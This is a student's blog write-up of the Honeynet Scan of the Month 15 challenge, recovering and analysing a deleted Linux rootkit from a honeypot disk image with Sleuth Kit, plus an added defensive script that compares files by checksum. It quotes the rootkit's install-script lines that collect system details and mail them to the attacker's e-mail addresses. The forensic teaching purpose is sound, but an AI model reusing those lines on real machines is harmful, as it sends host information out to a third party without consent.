Solving Honeynet scan of the month 15

In this post I’m doing an assignment given by Tero Karvinen on his Linux server course about computer forensics, by solving one of the Honeynet scan of the month challenges. I’m going to do this on my desktop computer: an i5-3570k (4 cores, 3,8 GHz, 6M cache), 16 GB RAM, 2x Asus GeForce GTX 560 Ti in SLI mode, running an Ubuntu live USB.

The assignment

The assignment is to solve the Honeynet scan of the month 15.

On 15 March. 2001, a Linux honeypot was successfully compromised, a rootkit was downloaded to the / partition and then deleted from the system. Your mission is to find and recover the deleted rootkit. If you are not sure where to begin on conducting this forensic analysis and recover the rootkit, we highly recommend you start with the Forensic Challenge. The steps you will have to follow for the rootkit recovery are similar to the steps discussed there. We have posted only the / partition for download to keep this challenge simple. The compressed image is 13MB, (honeynet.tar.gz) ‘MD5=0dff8fb9fe022ea80d8f1a4e4ae33e21’. Once you have downloaded, untarred, and unzipped the partition image, it will be 255 MB and the checksum should be ‘MD5=5a8ebf5725b15e563c825be85f2f852e’.

  1. Show step by step how you identify and recover the deleted rootkit from the / partition.
  2. What files make up the deleted rootkit?

Bonus Question:
Was the rootkit ever actually installed on the system? How do you know?

Bonus Question 2: (added by my teacher)

What information has the attacker left behind about himself?

Preparations

Downloading the ‘.tar.gz’: the URL is in a link on the assignment page. I downloaded the file and saved it to the desktop.

I unpacked the package with ‘tar’ (the x tells the command to extract and the f names the archive file to read) [1]

tar xf honeynet.tar.gz

It unpacked a folder called ‘honeynet’ containing a ‘readme’ file and a ‘honeypot.hda8.dd’ file.

Starting the forensics

I needed to find out which files had been deleted from the file system. To do this I used the command ‘tsk_recover’, which recovers unallocated (deleted) files from a disk image into a directory [2]

To use the command, I needed to have the ‘sleuthkit’ installed.

sudo apt-get update
sudo apt-get install sleuthkit -y

Then to work:

mkdir deleted
tsk_recover honeypot.hda8.dd deleted/

Among the recovered files was a tar.gz archive called ‘lk.tgz’, which I suspected to be the rootkit because of its size and because it was a package; no other recovered file looked anything like one. I unpacked it with ‘tar’.

tar xf lk.tgz

This unpacked a folder called ‘last’, containing a list of files, some of them with familiar names (ifconfig, netstat, ps, top).

drwxr-xr-x 2 xubuntu xubuntu    500 Feb 26  2001 ./
drwxrwxr-x 5 xubuntu xubuntu    120 Sep 16 10:44 ../
-rwxr-xr-x 1 xubuntu xubuntu   1345 Sep  9  1999 cleaner*
-rwxr-xr-x 1 xubuntu xubuntu  19840 Feb 26  2001 ifconfig*
-rw-r--r-- 1 xubuntu xubuntu   3278 Jan 27  2001 inetd.conf
-rwx------ 1 xubuntu xubuntu   3713 Mar  3  2001 install*
-rwxr-xr-x 1 xubuntu xubuntu   4620 Feb 26  2001 last.cgi*
-rwx------ 1 xubuntu xubuntu   7165 Feb 26  2001 linsniffer*
-rwx------ 1 xubuntu xubuntu     75 Feb 26  2001 logclear*
-rwxr-xr-x 1 xubuntu xubuntu     79 Feb 26  2001 lsattr*
-rwxr-xr-x 1 xubuntu xubuntu 632066 Feb 26  2001 mkxfs*
-rwxr-xr-x 1 xubuntu xubuntu  35300 Feb 26  2001 netstat*
-rw-r--r-- 1 xubuntu xubuntu      1 Feb 26  2001 pidfile
-rwxr-xr-x 1 xubuntu xubuntu  33280 Feb 26  2001 ps*
-rw-r--r-- 1 xubuntu xubuntu    708 Mar  3  2001 s
-rwxr-xr-x 1 xubuntu xubuntu   4060 Feb 26  2001 sense*
-rw-r--r-- 1 xubuntu xubuntu  11407 Jan 27  2001 services
-rwx------ 1 xubuntu xubuntu   8268 Feb 26  2001 sl2*
-rwxr-xr-x 1 xubuntu xubuntu 611931 Feb  8  2002 ssh*
-rw-r--r-- 1 xubuntu xubuntu    880 Oct 22  2000 ssh_config
-rw-r--r-- 1 xubuntu xubuntu    688 Feb 26  2001 sshd_config
-rw------- 1 xubuntu xubuntu    540 Oct 22  2000 ssh_host_key
-rw-r--r-- 1 xubuntu xubuntu    344 Oct 22  2000 ssh_host_key.pub
-rw------- 1 xubuntu xubuntu    512 Oct 22  2000 ssh_random_seed
-rwxr-xr-x 1 xubuntu xubuntu  53588 Feb 26  2001 top*

The two most important files in the folder are ‘install’ and ‘cleaner’. The attacker ran the ‘install’ script, which installs the rootkit. After that the ‘cleaner’ script removes lines from log files to clean up traces of the attacker.

Was the rootkit installed on the system?

Yes. Here’s how I found out:

I needed to mount the DD file to better read its contents. [3]

mkdir sda1
sudo mount -o "loop,nodev,noexec,ro" honeypot.hda8.dd sda1/

The option ‘-o’ lets us pass mount options. Here we gave four:

  • ‘loop’: lets us treat the file like a block device, so we can interact with the file system as if it were mounted from a real device [4]
  • ‘nodev’: do not interpret character or block special devices on the file system
  • ‘noexec’: do not allow direct execution of any binaries on the mounted file system
  • ‘ro’: mount the file system read-only

Now to see whether the rootkit had replaced files inside the file system image, for example the ‘netstat’ binary:

sda1/bin$ ll | grep "netstat"
-rwxr-xr-x 1 root root 35300 Feb 26 2001 netstat*

Here is the same information for the rootkit’s own netstat file:

honeynet/deleted/last$ ll | grep "netstat"
-rwxr-xr-x 1 xubuntu xubuntu  35300 Feb 26  2001 netstat*

The size and timestamp are an exact match, which tells us that the rootkit was installed on the system.
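The same check can be run over every file in the recovered archive at once, comparing each one against the same-named file on the mounted image. The script below is an added example (not part of the original post); it assumes the unpacked ‘last’ folder and the mount point are passed as arguments, and reports an MD5 match as strong evidence of installation, a size-only match as weaker evidence, and ABSENT when the image has no file of that name.

```shell
#!/bin/sh
# Added example: compare recovered rootkit files with the mounted image.
# Prints one line per rootkit file: MATCH, SIZE-ONLY, DIFFERENT or ABSENT.
# Arguments (assumed): $1 = unpacked rootkit folder, $2 = mounted image root.
compare_rootkit() {
    rk_dir="$1"
    img_dir="$2"
    for f in "$rk_dir"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        # Look for a same-named file in the usual system locations.
        target=""
        for d in bin sbin usr/bin usr/sbin etc; do
            if [ -f "$img_dir/$d/$name" ]; then
                target="$img_dir/$d/$name"
                break
            fi
        done
        if [ -z "$target" ]; then
            echo "ABSENT $name"
            continue
        fi
        rel=${target#"$img_dir"/}
        rk_sum=$(md5sum "$f" | cut -d' ' -f1)
        img_sum=$(md5sum "$target" | cut -d' ' -f1)
        if [ "$rk_sum" = "$img_sum" ]; then
            # Identical content: the trojaned file was installed.
            echo "MATCH $name $rel"
        elif [ "$(wc -c <"$f")" -eq "$(wc -c <"$target")" ]; then
            # Same size but different content: check by hand.
            echo "SIZE-ONLY $name $rel"
        else
            echo "DIFFERENT $name $rel"
        fi
    done
}

# Usage against the data from the post:
#   compare_rootkit honeynet/deleted/last sda1
```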

What information did the attacker leave about himself?

I noticed that the attacker is Romanian, or at least speaks Romanian, because many of the files were written in that language. Also, the attacker has set the install script to mail himself information about the computer:

echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com

From this, he is probably the owner of the e-mail addresses ‘last@linuxmail.org’ and ‘bidi_damm@yahoo.com’.

Sources

[1] AskUbuntu, ‘tar’

[2] Tero Karvinen, ‘tsk_recover’

[3] Tero Karvinen, ‘mount’

[4] AskUbuntu, ‘loop’


Miro Metsänheimo

A software developer from Finland born in -92. I'm passionate about computers and technology. Feel free to message me about anything!
